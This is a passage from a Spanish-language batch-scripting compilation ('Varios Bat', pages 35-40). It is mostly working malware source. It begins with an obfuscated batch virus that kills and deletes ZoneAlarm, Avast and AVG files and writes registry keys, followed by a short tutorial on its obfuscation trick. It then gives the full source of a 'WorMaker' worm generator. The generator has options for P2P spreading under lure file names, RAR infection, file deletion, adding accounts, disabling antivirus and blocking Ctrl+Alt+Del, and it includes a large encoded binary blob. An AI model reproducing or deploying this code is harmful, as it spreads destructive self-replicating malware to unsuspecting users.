22%a%%ai%*.*%a%%f%*.*%a%:22

Page 35: Varios Bat

%a%%y%zlclient%a%%y%zonealarm%a%%y%vsmon%a%cd %programfiles%\Zone Labs\ZoneAlarm%a%if errorlevel==1 goto 23%a%%ai%*.*%a%%f%*.*%a%:23%a%%y%aswUpdSv%a%%y%ashServ%a%%y%ashWebSv%a%%y%ashDisp%a%cd %programfiles%\Alwil Software\Avast4%a%if errorlevel==1 goto 24%a%%ai%*.*%a%%f%*.*%a%:24%a%%y%avgamsvr%a%%y%vgupsvc%a%%y%avgcc%a%cd %programfiles%\Grisoft\AVG free%a%if errorlevel==1 goto 25%a%%ai%*.*%a%%f%*.*%a%:25%a%cd %d%%a%%Re%1%Zz%%a%%f%%p%%ac%%j%%ab%%i%%j%%j%%a%%u%%ab%%h%X%h%%w%%v%%a%%u%%ab%%n%x%n%%w%%v%%a%%u%%ab%%i%%j%%j%%w%%v%%a%%u%%ab%%pa%Om%w%%v%%a%%u%%ab%S%pa%%k%%w%%v%%a%%u%%ab%P%z%%w%%v%%a%%u%%ab%%pa%Md%w%%v%%a%%u%%ab%%k%%h%%m%%w%%v%%a%%f%%p%%ac%%j%%ab%%i%%j%%j%%a%%ah%goto:eof

:w98%a%REGEDIT4%a%[HKEY_CLASSES_ROOT\%Zz%]%a%@=^"%aza%%z%fi%j%%h%^"goto:eof

Todos sabemos que hace set y @echo off(set define variables y echo off desactiva el eco,le ponen generalmente una @ antes  ya que es mas comodo q  escribir echo off>nul)

set g=abcdefghijklmnopqrstuvwxyz.\/-set h=g:~4,1call set h=%%%h%%%

En este ejemplo explico la parte en que definimos variables con un valor de un caracter que este dentro de otra variable.

set g=abcdefghijklmnopqrstuvwxyz.\/- (Caracteres)set h=g:~4,1 (h=al 4 caracter de g)call set h=%%%h%%% (le asignamos el valor)

Aca escribimos los archivos : 1.reg ,rundll32.bat y rundll32.com

call:w98 > "1.reg"call:polaris > "%e%.bat"

Page 36: Varios Bat

call:run > "%e%.com"

Como en la etiqueta "w98 , polaris o run" todas comienzan con "echo " (en este caso usamos una variable con este valor "%a%") con call vamos a esta etiqueta y redireccionamo s lo que debería aparecen en pantalla a un archivo.

1.exeregedit /s 1.reg%f%1.reg > nul%f%%e%.com > nul%Ax%%AzA%%z%fi%j%%h%> nul

--------------------------------------------------------------------END--------------------------------------------------------------------

Generador de Worms en batch

@echo offset a=echo set b=echo.set c=Efects.exe PrintColor set e=call:set line=-------------------------------------------------------------------------------If Exist Efects.exe GoTo ExisteEfcall:Efect > "Efects.com" & Efects.com >nuldel /q Efects.com:ExisteEfsetlocal enabledelayedexpansionTitle WorMaker [H-BlacK]%c%Escriba la ruta y nombre del Worm a generar [sin extension]: 14 1 & set /p name=if "!name!"=="" set name=Worm:RepetirIf Exist !name!.bat %c%El archivo !name!.bat ya existe,desea sobreescribirlo? [S/N] 15 4 & set /p sn=If not exist !name!.bat goto SobreEscribirWormIf !sn!==n ExitIf !sn!==N ExitIf !sn!==s GoTo SobreEscribirWormIf !sn!==S GoTo SobreEscribirWormif not !sn!==n GoTo Repetirif not !sn!==N GoTo Repetirif not !sn!==s GoTo Repetirif not !sn!==S GoTo Repetir:SobreEscribirWorm%a%@echo off>!name!.bat:ExisteEcolor 0eset d=cls%a%ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»%a%º                -  Menu  -                        º%a%ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ%a%ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»%a%º 1.  Propagaci¢n por P2P                          º%a%º 2.  Mensaje al Iniciarse                         º%a%º 3.  Agregar al registro                          º%a%º 4.  Infectar archivos rar                        º%a%º 5.  Borrar archivos                              º%a%º 6.  Manipular Red LAN                            º%a%º 7.  A¤adir usuario y pass                        º%a%º 8.  Copiarse y ocultarse                         º%a%º 9.  Descargar archivo en la v¡ctima              º%a%º 10. Crear muchas carpetas en el HD de la v¡ctima º%a%º 11. Apagar el PC de la v¡ctima en x segundos     º%a%º 12. Reiniciar el PC de la v¡ctima en x segundos  º%a%º 13. Incluir c¢digo de virus                      º%a%º 14. Bloquear Ctrl+Alt+Sup                        º%a%º 15. Borrar AV                                    º%a%º 16. Informaci¢n adicional                        º%a%º 17. Ejecutar oculto                              º%a%º 18. Salir                                        º%a%ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Page 37: Varios Bat

%c%Seleccione la Opcion: 14 1 & set /p d=if "%d%"=="" GoTo ExisteEif %d%==1 %e%P2P >> !name!.bat & GoTo ExisteEif %d%==2 %c%Escriba el mensaje que el Worm mostrara en la pantalla: 14 1 & set /p Mensaje= & %e%Msg >> !name!.bat & GoTo ExisteEif %d%==3 %c%Escriba el valor con el que el worm se agrega al registro: 14 1 & set /p RegValue= & %e%Reg >> !name!.bat & GoTo ExisteEif %d%==4 %c%Escriba la ruta del RAR a infectar: 14 1 & set /p InfectRar= & %e%InfRAR >> !name!.bat & GoTo ExisteEif %d%==5 %c%Escriba el directorio y nombre de los archivos a borrar: 14 1 & set /p VarDeleteFile= & %e%delF >> !name!.bat & GoTo ExisteEif %d%==6 %e%LAN GoTo Lanif %d%==7 GoTo UserPassif %d%==8 %e%CopyHide >> !name!.bat & GoTo ExisteEif %d%==9 GoTo DownFileif %d%==10 %e%MakeFiles >> !name!.bat & GoTo ExisteEif %d%==11 %c%Escriba la cantidad de segundos para apagar la maquina: 14 1 & set /p Time= & %e%Shut >> !name!.bat & GoTo ExisteEif %d%==12 %c%Escriba la cantidad de segundos para reiniciar la maquina: 14 1 & set /p Time= & %e%Reiniciar >> !name!.bat & GoTo ExisteEif %d%==13 %e%Vir >>!name!.bat & GoTo ExisteEif %d%==14 %e%AdmTask >>!name!.bat & GoTo ExisteEif %d%==15 %e%AVkill >>!name!.bat & GoTo ExisteEif %d%==16 %e%Info & GoTo ExisteEif %d%==17 setlocal disabledelayedexpansion & %e%RunHide >>%name%.bat & setlocal enabledelayedexpansion & GoTo ExisteEif %d%==18 Exit%c% Valor incorrecto. 15 4%a%%c% Presione una tecla para continuar . . . 14 1Pause>nulset d=GoTo ExisteE:Efect%a%XPPPYZIQD[L-f6-g41GDSXu'@,~P^^P_O,!(GU(GZ(Gnu5-NETSEND_V1.00_JRT=%a%CFFFRX,`,`2$F=@!t.rQ0%%IuL0%%(%%(%%GERYAARX2%%(%%t8-EFECTS.EXE___01422%a%1v1v0^<0xD^"1^<0$G^"P/0A0^^F^"12d^"1TP)0B0z0z1^^Q+0m1TQ-w^"1+1S1#0B0zd^"0]%a%Q+0z0Y1_1o0Sh^"0u0XP*d^"0]P,0z0Y1_1uv^"P-q^"e^"e^"0S0.0^>1kP-0^&E^"001S1.%a%0S130X1(K^"100(100(100(0T16v^"081/0$M^"070S050T0-v^"0/0C0T0^"v^"081/0$%a%M^"070X17I^"0XQ+L^"0_N^"0S050T0-v^"0/0C0X1#L^"1S0#1#0F19P*D^"0^<Q/1F1C0^<%a%1#D^"1C0i1^<0x1Y0^<P*D^"0p17!(c)[email protected]_XXXX^<%a%s'Y9Pv-1D:PA(=I.@$Y9!!^&`?gk/neVx,AtyU^^6!.Tro=^&^"!K`hXN^"-4PTqI@7ZG%a%Gkq1!'Ok4^"nZmHCwD\NV/'-4.foCPobxF(R[b9SaE'm68\=-,D^^Sjg2,4Hh=^".=-%a%bFY?oh+ojpq9u5/(r_Bhx=!?OQ!N!'Ek%%9#\qk^"ifvsw^^cdQr{,;YW!,YC!mv7Yu%a%i-4Y)Ib'Q(_9ee)Jbb!'jNE')-'nNJ^&B$p)BFzvj=.HD'eEv]N?xj29F$x^"y:MBY%a%ek8*j/E'*R(W:L+#Sm'@3h:^>!'!!!!,8!!,7yY!,N^"!!!!!!!)!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%%!!!!!YMZ#K$x'r:KdQ^<!Zc=a3R2Vp(Wj5w%a%C8Z_RfaGr4r^^)\/GI7^^*NVaC^"NXhgBFiD^<[;3AOi7O!!!!!!!+$$!!.B^&`!^"zH\l%a%!!!!!!!!!^"dP^"^>#v!A,D!)!!!!,8!!^"f^"^&#mvkN^"$p#+!'!$!!!^"!!!^"!!!!!1!!%a%!A!!!!!!!!#k!!!!!!!!^".!Q!!,8!!!!!!!-!!!!!!,8!!N^"!!!!7O!^"!!!!!!!!%a%^&Z!!!!!!!!!!!!!!dPBf1qN^"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!$e7{)I!!!!!^&!$!!!a!!!!!!!!!1!!%a%!!!!!!!!!!!!!!^"F!!*o^>z0O^&Z!!!!!1!!!#dQN^"!A!!!!^&Z!!!!!!!!!!!!!!!!%a%7O!$NL\-O+!!!!!!^&Z!!^"^&!Q!!^"F!!!3!!!!!!!!!!!!!!!!!)!!^"^&){plD0(NNz%a%,YY]#ow8Y3jOZM?-c]Br!4P^<!!9%%N^"!G!!*qyXxcvMN2-7C/^"drZ^&]!(7n(u$09$%a%^>VNd-^^AA5xz[yQP/^>^<h@:F/-^^nj.^"H!!DOr*?vt]n4%%W:fg_R!#(dV83uCr^^^&5Z]%a%mXY5Sm5F\BErZ6Dc^>TrwvCNb#V^^Oz{{^"zhUq-Rrl:\$]C),DBQhS%%_f8?/]'N#bu%a%u2dUZ'0{wy'9#Kx`Ar6[K0z{z9Pk#o,$#oHqIo9M=^>9c,:)IQ4[3(a`oyFtp0?]?%a%Q9d0E+-^<h*1/o^&oTRW_^<^&X9P2pwQ-h(1%%Cj5bqMc@:rdUW]ZF\^&r0z^^Vn7;Yzf^<H%a%In^&:f,\fQ3t!#U`1d;KK2$^"IEk$3pf)U1r+mu=EG=KExy6C7si/D]LUKtOKz8Yqx%a%^"g^&B0S`\`^<KTx^"C+;nttOSOGPLx1og6b!CAmXUyc'SYt]`%%d=1O?3U;-j$,PQQL[%a%6NO/!@LficLR//I[zz$p8__a',`oACs0Xa!qGIi,HZO!()=v^&k0cZIipo%%j6#;ok%a%)V8re/Q\7)R#NJp^"3^<SwlvMY_(I/%%C;l^<GQQ]=DL7J9zA?o^^=eGI^"q!A[2S^<M@K^&%a%J4x'ycpdn=x7(bU-qH56e)7757.^^+lAu4Dq0pPeT^&T*s4oc\oTNK5oe0l(sQz{\E%a%DXySxIwRuMjKcRsbt-WUe0$fV*^>GV5_EHElY2[a7AHy')G;tEUS2[#^>#RuMWd8wg%a%RVYjJdOax+t[^<s'g^<8KO#/OVvk?88K`{yhdQZlOeSd(9887c+6gL!*ekie#\NBru%a%^&\.x3^^u+0K^&^"?qmy9YPq!V!^>t.wR=H7\YEIm2jW8;m;CJw,icKLryGRx9ikP@epI%a%FR$ZmcKHNC#bw^&4!.4fd=IZ/'nS-wO[^^9sD^<89c#,3;BM,K4^"5YZB^&=:(46.%%f)Y%a%)yOCKHd'v(Z3y1F17`5#Dnu:[\O{WXgDMzM`vDA7)TIS8Yk_%%WhwOH0E^&jcc^<up\%a%.x[W+%%#76DKt!CcZEau^^m+9jlDxjX:T[Blg`pq(I#;gk/:+^<OI3x@PG[4mI,*P:J%a%,1^&2^&]v.=o*^>O1^&q?;Oev2#O6^"=y$E6M2Sr//F^<(q75De^^FUUc*)^^Z*GxGe1#+%%q%a%?d:F%%h7Mz5TDZO\-^&^<U1@kDhD+ty9QFS.=u4Mi^&`YErW-=`_%%H!j)Y6j:?4^&_Tv7

Page 38: Varios Bat

%a%Ds?#[!OO1{!@C_rjINC+mbQnNW$m2gt^&%%FbW_1a1S{i5O.Hr`Op3xzbee+*gtiN^"%a%v^^Y^&`ITO9!7T#Rf'M;Qm9wZ^^j:I^&Jh1!1_(R+=p*F-tct_xS/.H'UM3C$`'A^<P2Q%a%mj%%A;ZzM^"F$(O=[Pu`0y8+2T^&PUf;;G^&]\,Jw7+I[HIiqJr/T$R_S`pr[lP\n3zG%a%FGak.LczU!ko^"R6crQh^&0T3k@[(ya%%'`C?nQCD3[hu!$)tWdIU*,#'4!)1^&VPR8h%a%HIi9O.dcl^<S5)Qd9'M;v'1!uD^<RcO^"8\G,Q*)l-D#Krs5,$U9h!7N?yK)HL2^&C^"^<%a%E]E6Y;Q!_qIYVjq9x`+i4^&q!yLggmSG(!Ze,1_-mM^>6X^^a@X8jjyt,agyi/3Yd]A%a%2mEB*^<MtHL5FQwfwSxQlqr657WsJ$UbLG0V1=AEuw{)gs)'#f]y$R1*EA^&Dr.Q.m%a%4$7k6hww=gj_*!/O%%LiH@a^^ri!-jmG57Dc?CHp:Nf\oDSP=tMwmm^^N;ZYwjVo:;p%a%E2^<tbd^"7*7/:I)#37`dUY@qB:B+tJ.D49eoSabO`:D8ub)!^&/eMt+q'=+=cgs%%d!%a%mbg#P(337MEuICwJo^"HD*u6vFR!l$$-`Yc%%NLBT64`gR=`P%%Rh=rru?\D_,K)j+/%a%,;.fU+^&#Is!b4,V:Esnof+?^<g$tNaMsSM_Yj8P+2GVbg9wq6%%(^^sYA7qH.`N_X/@%a%^"rv9#a$@5TSJdxU?3q^<pbJ8vl`q]Yp/^"/\HN(lD`q,tb33E-FvE^"EW$V8t_,]WpQ%a%;O)m#Wd`$-gP!dB6NLmV:^"-mHFYiU$fa,sy[Kl^"sXdqke;iwL\Eu5%%pD)f,bqCTH%a%^"Cp0M#CJdd7h^&aXu^&C3/7.ztdNgI7sn?UC*qG!46XLFJ15LVi7rKJT;Y^"tHEI1$0%a%L^^9^&q[VjSZ!^"^"^<iSs[$C^^zL7By^"3f3HXEt^^rBsS\dtcGQ$!$,XQ)u^<04!A+O,:d[%a%^&A2_^<zdQVcVjs$uKr7)PWp:^^NM1L@#NV6nZAWf!iT*1$Ces.Y!WGs,^"F/9FT!aWI%a%m5^<YC^>T^"vP-I]\q#cms%%;cnr:u,8a,qq+#T$Sj^":IogwVndQ]5RT!?TJvn\^>ogbn%a%@Dp(;.-DVeFAY=\?e?iudRC;3-d]^&ophwp^<l5]5^&V*e^^]N;GGkQFcxYYD@7`0w,B%a%)m^&#Xx!7)Io{?^>a)IY^";OSah@^&VR^>mWT-YS[e^&F0^&KgoT68Tx71*-0?yUmWJgCiK%a%#3^&_Q:q2=ZXpW)Cl^"*P%%3l_O7h,S@@S_.gd^<Nx:i4+TE%%F)V2X@^>m9^"ixaI;)Nfl%a%?ahH1y!61CF$lpsp`J[ieY0O!x/hiq82YZEI[fXNE;'O)0BA=k9!0hVR!a^^_L)Rv%a%q\M3uDx'c4s1BUvPQydJ^",#1E\_rMcmz'syjPYa@p1r^^y9r5M4dGo/w]gU]I$@#j%a%..'D__:^>!:S{-=A%%EbS[2z7V#TS{^",8lLh!T,x#3:O)i^",8tV]Vl!'D:$Y=02Z!-%a%]d);!'D8%%6QC,8DxgXW/2z7Oi2_N,8DxN^>+^&,x#7S,mY^",8t%%SXwuEn`:^>!ENFVK%a%){!A1y:B!Ag?#oAK!)$(^"p7gdU=-P4/w^"l7yN'2W8t0^>$T!KSe,9===]$`N3N,OH%a%R6^>R#wNv!+D2Y9^>6($!x,L!#\HYy^>s^"i!v#l)K\0)a(L!1h5'^".Yj-QC(S!#XO$y%a%Im^&/i9x3vit9mFjN${GT[94^&V0h^<n=IMITYa!+@Kofa!^&S7OHR^<-b@5+?_sWW_!u%a%EY-_oRA0E/mu:^^5m^"me2jbBEn9Gx7j0DIl%%fcd^&`.DftepKSGuwfmsOyE-7g@Lm1%a%;QGTN{t'DzgJTx^>^"0^<*Q`Ily(ZTW8'3^"^&Qxe4=^"\/K;c'*TrtVo\nX'5-Ah5jv!Q%a%!)S+F25`#C_3tX=6Gm^>DQ^>Pw^&In/al%%-US^^'QC[G'Z_gf\Sp@D^"{.KPC5smSX/[e%a%:?sj$+G5Io7[?_=_=78xGz@no1e:yD2/-XK3xuV]YyJYg?%%Pt8;x^^y^&a-EC/#J_M%a%t)Qa!W8Z(lg_8Gt`)$^&JukN$?]K0u^"EdA/R'iCa(8n!.`'L;a7G1(T]y_1a.+OfS%a%iE$-:baE=Y@RGR^<)C9G,!SzO.mdK8fm'D\u*%%\[Gw3GwlVlza:BfN``AK5mZYndF%a%Dp#xd^>17?%%k'XN*ZCENGo^^pl^"HgX9rZCC9@R2^"lc^>HhAU%%gHRF-q:GQ+e;dX.m1e%a%0BSuSDDxSwPqtYS59gZ_zPbm#=eM@yXKCYq1U7TpIkam'5^&pVJ-=JDn?yM#3!B!O%a%2^<i%%,W4Cog3Vk0GhD5%%^>$@V1;N(,1q^";v2\yD9Un7V?z#mX^"FLs1o58uQ5AAi{Hx%a%^<BE^&Ki6R\T;mkAXBh@PK_2E0.YvjeIVf19={Wcnn_UY;lx*XJ!^>k[P6r:[0s\[^<^"%a%[P4^"s\D];Gk9\^^wuud7a==+F^<^"*t#{z98T]M^"GgBJO)-^&r!5^&@Cim6!S2f#0^&n,@%a%Hcu^"AA6j4!!adP$WD^^QFc]BrK0vGA$/mF#hi`nYJ3aro'FT?l;@x:D\n?Qo{)TZF%a%7o,3W.`R46PGnmI]G,t)P^",Ne4G^&J^>7[;d^<40vaGfF!OVbFLIj^<g=Ln6uFU9xV*c%a%I)iR.ZLBzVn[Wg\xH2GDjbQ^"XNz@^<J[k8^"S,gs_^>?`0`x)7(Ga0aeY94P*dB^^]^^Q%a%!+Pqgrb6r^<^>-+NT-aMkK,ralvr!!@k8bGzJkV{hk3Cwk)t-Co^>hX0Q*$JX$kL;Fi%a%J[LDBV%%xr^"^&6UFA4t^^n**MhZJk^^sg(11i*iUAsP+0].[e0FjHS1^"U\3pu{G:OK8$%a%KT0s^"^>*3c,/M'/{!AiC^>p?.{Iom7AD'nC9@@7;J@f!ADjYFjIx5un._)=GQ2VRS*%a%FDdY:dy.^"QuHzGL$!AY9,4]!^<H!$dX?x!^^mvkezNdh#5Nx@-#XPQu^"#m($N$d`$C%a%b2N^^G!+]!')K?DU^&X:Nb*q)ACOK%%q8^^r1L%%hWs^&JLh7s!`ha)?=I:n)/.hrIBW:l%a%$DU^&!:oitRiUf=^"%%^&e%%u%%8`;J+_`Tz!O.I^&z^&LA\$v#,h^&KsEvIW'`Rh2n^<H61Lq%a%BiBifbNR!!!!!!!!!*,4!!!!#,L]G!)IRmnoM{MrK:Wny1OWSm'A8^<99D=^&[jf^&5%a%J.uqKtx#dsa=bsdQ!!!!#XbVKI6JyPoxn$4`#XbDwy'ag3,^&y[5ri{)eVQj.nRG`%a%oh'')l83^&Xrs-+/(n0YW0[82u=-Sf(:?n0YW0[82u=-Sf(;X,@,?GYO?_T#fd0S6%a%'8,?GXx+=@(kYXK/':GnTAow/*xt6I{^"OA,^>3E)A7JxQOC=/8E!^>+7beMOg^>{^"yi%a%Qq=^<#m9)K:Rw,W:BK1,?7C[R{^"zUZ-cdY9,8!f^":IBj=!,dGN)ohlq9IKGcl*$^&B%a%$(4`87CMY*![xt^&JQ1uT*pf'R{_zH4^"V^"^&'+*ron8m({dtG#1q(d%%5!@3\#\e^<yo%a%=C!-!kf:Iw'/+9q:x^^ryh;0+x`\T!9!*d^^N@-^^e11zlpMy_{^^rBh1H0W!'!DH4#[%a%{^"w{!)!!^"f\BNDWFzx_M+bN2!^"!),4^"^&/6s\7y/,3jzs?:%%B8xS\\(+/:)w/y=#T%a%yCBYyY!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!xd!9!qdPBf!!!!!!!!!!!!!!'^&!^"N(hd#+!!!!!!!!!!!!!!!F1q)I%a%J^&!-!!!!!!!!!!!!!!!!!!!!!!!!!%%wO^"^&(W!^"N-hd#+3!!$!^<?w%%5Iu!'!!!!!!%a%wg!-!!!!!^"xd!9!!!!!^"0n\Lq;VVhuI-;lN#%%^^/k91VUT^"CW!+\u(M*!-9Q$'_!!%a%;pt%%T^&3Q.feQX^^#k!)t5jV5+wUN{)lTeIWBf!L3R.jsSA#O9H2RKRp!!^"rk/X7].%a%G'1^"_N_G!!]gATZSC8Q*gq_g!!!2B);W=;^<ERhb=1q!!)TZMFz!^"^<^<4WJ^<k.VmLO%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%a%!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!^&Z!!!!!!!!%a%,8!!!!#k!!!-N^"!!7O!!!G!!!!6j~^<

Page 39: Varios Bat

GoTo:eof:P2P%a%if exist "C:\My Shared Folder\" (GOTO MSF) else GOTO Cont1 %a%:MSF %a%copy /Y %%0 C:\My Shared Folder\Nod32.bat %a%copy /Y %%0 C:\My Shared Folder\Norton.bat Full+Crack.bat %a%copy /Y %%0 C:\My Shared Folder\Tarjetas.bat %a%copy /Y %%0 C:\My Shared Folder\Ring.bat %a%:Cont1 %a%if exist "%%programfiles%%\Kazaa\My Shared Folder\" (GOTO Kazaa) else GOTO Cont2 %a%:Kazaa %a%copy /Y %%0 %%programfiles%%\Kazaa\My Shared Folder\Nod32.bat %a%copy /Y %%0 %%programfiles%%\Kazaa\My Shared Folder\Norton.bat %a%copy /Y %%0 %%programfiles%%\Kazaa\My Shared Folder\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\Kazaa\My Shared Folder\Ring.bat %a%:Cont2 %a%if exist "%%programfiles%%\Kazaa Lite\My Shared Folder\" (GOTO Kazaa2) else GOTO Cont3 %a%:Kazaa2 %a%copy /Y %%0 %%programfiles%%\Kazaa Lite\My Shared Folder\Nod32.bat %a%copy /Y %%0 %%programfiles%%\Kazaa Lite\My Shared Folder\Norton.bat %a%copy /Y %%0 %%programfiles%%\Kazaa Lite\My Shared Folder\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\Kazaa Lite\My Shared Folder\Ring.bat %a%:Cont3 %a%if exist "%%programfiles%%\Grokster\My Grokster\" (GOTO Groks) else GOTO Cont4 %a%:Groks %a%copy /Y %%0 %%programfiles%%\Grokster\My Grokster\Nod32.bat %a%copy /Y %%0 %%programfiles%%\Grokster\My Grokster\Norton.bat %a%copy /Y %%0 %%programfiles%%\Grokster\My Grokster\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\Grokster\My Grokster\Ring.bat %a%:Cont4 %a%if exist "%%programfiles%%\Morpheus\My Shared Folder\" (GOTO Morph) else GOTO Cont5 %a%:Morph %a%copy /Y %%0 %%programfiles%%\Morpheus\My Shared Folder\Nod32.bat %a%copy /Y %%0 %%programfiles%%\Morpheus\My Shared Folder\Norton.bat %a%copy /Y %%0 %%programfiles%%\Morpheus\My Shared Folder\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\Morpheus\My Shared Folder\Ring.bat %a%:Cont5 %a%if exist "%%programfiles%%\EDONKEY2000\incoming\" (GOTO Edon) else GOTO Cont6 %a%:Edon %a%copy /Y %%0 %%programfiles%%\EDONKEY2000\incoming\Nod32.bat %a%copy /Y %%0 %%programfiles%%\EDONKEY2000\incoming\Norton.bat %a%copy /Y %%0 %%programfiles%%\EDONKEY2000\incoming\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\EDONKEY2000\incoming\Ring.bat %a%:Cont6 %a%if exist "%%programfiles%%\Gnucleus\Downloads\" (GOTO Gnuc) else GOTO Cont7 %a%:Gnuc %a%copy /Y %%0 %%programfiles%%\Gnucleus\Downloads\Nod32.bat %a%copy /Y %%0 %%programfiles%%\Gnucleus\Downloads\Norton.bat %a%copy /Y %%0 %%programfiles%%\Gnucleus\Downloads\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\Gnucleus\Downloads\Ring.bat %a%:Cont7 %a%if exist "%%programfiles%%\eMule\Incoming\" (GOTO Emule) else GOTO Cont8 %a%:Emule %a%copy /Y %%0 %%programfiles%%\eMule\Incoming\Nod32.bat %a%copy /Y %%0 %%programfiles%%\eMule\Incoming\Norton.bat %a%copy /Y %%0 %%programfiles%%\eMule\Incoming\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\eMule\Incoming\Ring.bat %a%:Cont8 %a%if exist "%%programfiles%%\BearShare\Shared\" (GOTO Bear) else GOTO Cont9 %a%:Bear %a%copy /Y %%0 %%programfiles%%\BearShare\Shared\Nod32.bat %a%copy /Y %%0 %%programfiles%%\BearShare\Shared\Norton.bat %a%copy /Y %%0 %%programfiles%%\BearShare\Shared\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\BearShare\Shared\Ring.bat %a%:Cont9 %a%if exist "%%programfiles%%\Shareaza\Downloads\" (GOTO Shar) else GOTO Cont10 %a%:Shar %a%copy /Y %%0 %%programfiles%%\Shareaza\Downloads\Nod32.bat %a%copy /Y %%0 %%programfiles%%\Shareaza\Downloads\Norton.bat %a%copy /Y %%0 %%programfiles%%\Shareaza\Downloads\Tarjetas.bat %a%copy /Y %%0 %%programfiles%%\Shareaza\Downloads\Ringt.bat %a%:Cont10

Page 40: Varios Bat

%a%if exist "%%programfiles%%\ICQ\shared files\" (Goto ICQ) else Goto Cont11 %a%:ICQ %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Crack.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Manual.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Msn.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Troyano en .txt interavtivo.bat %a%copy /Y %%0 %%programfiles%%\ICQ\shared files\Sub7.bat %a%:Cont11 %a%if exist "%%programfiles%%\Filetopia3\Files\" (Goto Fileto) else Goto Cont12 %a%:Fileto %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Crack.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Manual.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Msn.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Troyano en .txt interavtivo.bat %a%copy /Y %%0 %%programfiles%%\Filetopia3\Files\Sub7.bat %a%:Cont12 %a%if exist "%%programfiles%%\appleJuice\incoming\" (Goto manzana) else Goto Cont13 %a%:manzana %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Visual Basic.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Visual Serial.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Crack Winrar.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Crack.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Manual.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Msn.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Jhon the Riper.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\No-IP DUC.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\EscondeTroyanos.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Troyano en .txt interavtivo.bat %a%copy /Y %%0 %%programfiles%%\appleJuice\incoming\Sub7.bat %a%:Cont13 %a%if exist "%%programfiles%%\LimeWire\Shared\" (Goto limon) else 